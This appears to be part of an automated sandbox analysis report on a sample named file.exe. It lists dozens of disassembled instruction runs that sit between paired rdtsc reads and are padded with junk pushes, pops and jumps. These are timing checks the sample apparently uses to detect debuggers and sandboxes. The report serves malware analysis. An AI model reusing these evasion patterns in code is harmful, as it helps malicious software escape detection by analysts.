                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFADEF second address: FFADFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F389C838396h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9DD93 second address: F9DD98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBA49 second address: FFBA67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C8383A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBA67 second address: FFBA6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEFC8 second address: FFEFE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F389C83839Eh 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEFE5 second address: FFEFE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEFE9 second address: FFEFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F389C83839Eh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEFF9 second address: FFEFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEFFD second address: FFF01D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C8383A8h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF6E2 second address: FFF6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF6E6 second address: FFF6EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65F9D second address: F65FA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100246A second address: 1002470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1002470 second address: 1002474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1002474 second address: 1002478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1002478 second address: 1002492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c jmp 00007F389CFCC94Ah 0x00000011 pop esi 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10025DF second address: 1002601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F389C8383A7h 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10027D8 second address: 10027F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC959h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10027F5 second address: 1002815 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F389C8383A5h 0x00000008 jno 00007F389C838396h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BCBE second address: 100BCC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BCC4 second address: 100BCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BCC9 second address: 100BCCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BCCF second address: 100BCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A09A second address: 100A0AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F389CFCC946h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A33E second address: 100A344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A634 second address: 100A644 instructions: 0x00000000 rdtsc 0x00000002 js 00007F389CFCC946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A644 second address: 100A648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A648 second address: 100A680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC94Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F389CFCC953h 0x00000014 pop ecx 0x00000015 jmp 00007F389CFCC94Ch 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A680 second address: 100A68A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F389C83839Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100AC1F second address: 100AC39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F389CFCC951h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100AC39 second address: 100AC59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F389C8383A1h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B1F4 second address: 100B1F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B1F9 second address: 100B1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B7B1 second address: 100B7B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B7B5 second address: 100B7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FB9D second address: 100FBA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F389CFCC946h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FBA9 second address: 100FBAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100EF21 second address: 100EF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F389CFCC954h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100EF40 second address: 100EF44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100EF44 second address: 100EF48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100EF48 second address: 100EF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100EF4E second address: 100EF64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F389CFCC94Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F0C7 second address: 100F0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jne 00007F389C838396h 0x0000000d jmp 00007F389C8383A1h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F893 second address: 100F8A2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F389CFCC946h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F8A2 second address: 100F8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AAD0 second address: 101AADA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AADA second address: 101AAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F389C838396h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AAE4 second address: 101AB05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F389CFCC953h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F389CFCC946h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B041 second address: 101B0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389C8383A6h 0x00000009 jp 00007F389C838396h 0x0000000f popad 0x00000010 pushad 0x00000011 jc 00007F389C838396h 0x00000017 jmp 00007F389C83839Fh 0x0000001c jmp 00007F389C8383A5h 0x00000021 popad 0x00000022 pushad 0x00000023 jmp 00007F389C8383A3h 0x00000028 jo 00007F389C83839Ch 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B394 second address: 101B398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B398 second address: 101B3B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C8383A1h 0x00000007 jne 00007F389C838396h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B6E8 second address: 101B748 instructions: 0x00000000 rdtsc 0x00000002 je 00007F389CFCC946h 0x00000008 jmp 00007F389CFCC954h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F389CFCC958h 0x00000014 pushad 0x00000015 jmp 00007F389CFCC959h 0x0000001a push esi 0x0000001b pop esi 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e popad 0x0000001f popad 0x00000020 push edx 0x00000021 pushad 0x00000022 jc 00007F389CFCC946h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B898 second address: 101B89E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B89E second address: 101B8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101BA0B second address: 101BA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389C83839Bh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101BA1E second address: 101BA23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101BA23 second address: 101BA49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F389C8383A6h 0x00000008 jng 00007F389C838396h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101BA49 second address: 101BA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101BA4F second address: 101BA6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F389C838396h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f je 00007F389C8383A2h 0x00000015 jl 00007F389C838396h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E304F2 second address: 4E3054D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F389CFCC952h 0x00000009 adc ah, 00000058h 0x0000000c jmp 00007F389CFCC94Bh 0x00000011 popfd 0x00000012 mov eax, 3473470Fh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c jmp 00007F389CFCC952h 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F389CFCC957h 0x00000029 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50041 second address: 4E500C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F389C83839Fh 0x00000009 jmp 00007F389C8383A3h 0x0000000e popfd 0x0000000f push ecx 0x00000010 pop edi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 jmp 00007F389C8383A5h 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c mov si, D503h 0x00000020 mov ax, BE5Fh 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a call 00007F389C8383A7h 0x0000002f pop esi 0x00000030 jmp 00007F389C8383A9h 0x00000035 popad 0x00000036 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E500C5 second address: 4E500CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E500CB second address: 4E500CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50298 second address: 4E5029C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5029C second address: 4E502A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E502A2 second address: 4E502A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E502A8 second address: 4E502AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E502AC second address: 4E502C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F389CFCC94Dh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E502C9 second address: 4E502CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E502CD second address: 4E502D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E502D3 second address: 4E5030E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F389C8383A0h 0x00000008 pop ecx 0x00000009 call 00007F389C83839Bh 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov ebp, esp 0x00000014 jmp 00007F389C83839Fh 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5030E second address: 4E50312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50312 second address: 4E50316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50316 second address: 4E5031C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5031C second address: 4E50322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50322 second address: 4E50326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70756 second address: 4E7078A instructions: 0x00000000 rdtsc 0x00000002 mov esi, 1C718663h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F389C8383A9h 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F389C83839Dh 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7078A second address: 4E707BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 05A2h 0x00000007 call 00007F389CFCC953h 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 call 00007F389CFCC94Eh 0x0000001c pop esi 0x0000001d popad 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70923 second address: 4E70936 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bh, 3Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70936 second address: 4E7093B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7093B second address: 4E70968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, FEh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ret 0x0000000b nop 0x0000000c push eax 0x0000000d call 00007F38A0918CE5h 0x00000012 mov edi, edi 0x00000014 jmp 00007F389C8383A4h 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov dx, 3CD0h 0x00000021 mov ax, dx 0x00000024 popad 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E70968 second address: 4E709CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F389CFCC950h 0x00000008 pop ecx 0x00000009 call 00007F389CFCC94Bh 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 call 00007F389CFCC954h 0x00000019 mov dh, cl 0x0000001b pop edx 0x0000001c pushfd 0x0000001d jmp 00007F389CFCC94Ch 0x00000022 add al, FFFFFFA8h 0x00000025 jmp 00007F389CFCC94Bh 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov di, B416h 0x00000034 movsx edx, ax 0x00000037 popad 0x00000038 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E709CD second address: 4E70A12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F389C83839Bh 0x0000000b sub ecx, 4910709Eh 0x00000011 jmp 00007F389C8383A9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F389C83839Dh 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20074 second address: 4E2008C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F389CFCC954h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2008C second address: 4E20090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20090 second address: 4E200DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b movzx eax, di 0x0000000e movsx ebx, ax 0x00000011 popad 0x00000012 pushfd 0x00000013 jmp 00007F389CFCC94Eh 0x00000018 xor al, 00000078h 0x0000001b jmp 00007F389CFCC94Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov dword ptr [esp], ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F389CFCC955h 0x0000002c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E200DB second address: 4E2019C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F389C8383A7h 0x00000009 xor ah, FFFFFF9Eh 0x0000000c jmp 00007F389C8383A9h 0x00000011 popfd 0x00000012 mov edi, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebx 0x00000018 jmp 00007F389C83839Ah 0x0000001d push eax 0x0000001e jmp 00007F389C83839Bh 0x00000023 xchg eax, ebx 0x00000024 pushad 0x00000025 mov edi, ecx 0x00000027 pushfd 0x00000028 jmp 00007F389C8383A0h 0x0000002d and ecx, 4A2803F8h 0x00000033 jmp 00007F389C83839Bh 0x00000038 popfd 0x00000039 popad 0x0000003a mov ebx, dword ptr [ebp+10h] 0x0000003d jmp 00007F389C8383A6h 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007F389C83839Dh 0x0000004c xor cx, F346h 0x00000051 jmp 00007F389C8383A1h 0x00000056 popfd 0x00000057 mov ch, 51h 0x00000059 popad 0x0000005a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2019C second address: 4E201A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
